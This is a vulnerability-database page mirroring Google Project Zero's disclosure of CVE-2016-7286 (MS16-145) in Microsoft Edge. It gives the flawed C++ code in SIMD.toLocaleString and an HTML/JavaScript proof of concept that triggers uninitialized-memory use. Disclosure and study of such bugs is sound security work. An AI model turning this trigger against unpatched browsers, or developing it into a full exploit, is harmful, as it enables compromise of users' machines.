Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145) Exploit

🗓️ 21 Dec 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt🔗 0day.today👁 33 Views

Microsoft Edge exploit in SIMD.toLocaleString Uninitialized Memory (MS16-145

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC		Microsoft Edge browser vulnerability, which allows a hacker to trigger a service failure or execute arbitrary code
26 Jan 201700:00
bdu_fstec
Circl		CVE-2016-7286
21 Dec 201600:00
circl
CNVD		Microsoft Edge Memory Corruption Vulnerability (CNVD-2016-12452)
14 Dec 201600:00
cnvd
Check Point Advisories		Microsoft Edge Memory Corruption (MS16-145: CVE-2016-7286)
13 Dec 201600:00
checkpoint_advisories
CVE		CVE-2016-7286
20 Dec 201605:54
cve
Cvelist		CVE-2016-7286
20 Dec 201605:54
cvelist
Microsoft KB		MS16-145: Cumulative security update for Microsoft Edge: December 13, 2016
13 Dec 201600:00
mskb
Microsoft KB		December 13, 2016 — KB3206632 (OS Build 14393.576)
13 Dec 201608:00
mskb
Kaspersky		KLA10920 Multiple vulnerabilities in Microsoft Browser
13 Dec 201600:00
kaspersky
Microsoft CVE		Scripting Engine Memory Corruption Vulnerability
13 Dec 201608:00
mscve
Rows per page
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961
 
The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:
 
        Var* newArgs = HeapNewArray(Var, numArgs);
        switch (numArgs)
        {
        case 1:
            break;
        case 2:
            newArgs[1] = args[1];
            break;
        case 3:
            newArgs[1] = args[1];
            newArgs[2] = args[2];
            break;
        default:
            Assert(UNREACHED);
        }
 
If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:
 
    var v = SIMD.Int32x4(1, 2, 3, 4);
    v.toLocaleString(1, 2, 3, 4)
-->
 
<html><body><script>
    try{
    var v = SIMD.Int32x4(1, 2, 3, 4);
    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
    }catch(e){
    alert(e.message);
 
}
</script></body></html>

#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Dec 2016 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.82743
microsoft edgeexploitsimduninitialized memoryms16-145type confusionjavascriptvulnerability
33